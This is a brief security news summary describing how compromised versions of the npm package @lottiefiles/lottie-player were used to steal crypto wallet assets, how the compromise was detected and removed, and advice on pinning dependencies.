ReversingLabs researchers discovered malicious versions of the popular npm package @lottiefiles/lottie-player. Versions 2.0.5, 2.0.6, and 2.0.7 were compromised and used to spread malicious code designed to steal crypto wallet assets. The attackers altered the lottie-player.js file, replacing its code with their own. Differential analysis revealed significant changes in package size and behaviors, including the introduction of URLs related to Bitcoin exchange services. The compromise was quickly detected, and LottieFiles maintainers worked with npm to remove the malicious versions. This incident highlights the importance of secure development practices, such as pinning dependencies to specific versions and regularly conducting security assessments to verify the integrity of open-source libraries.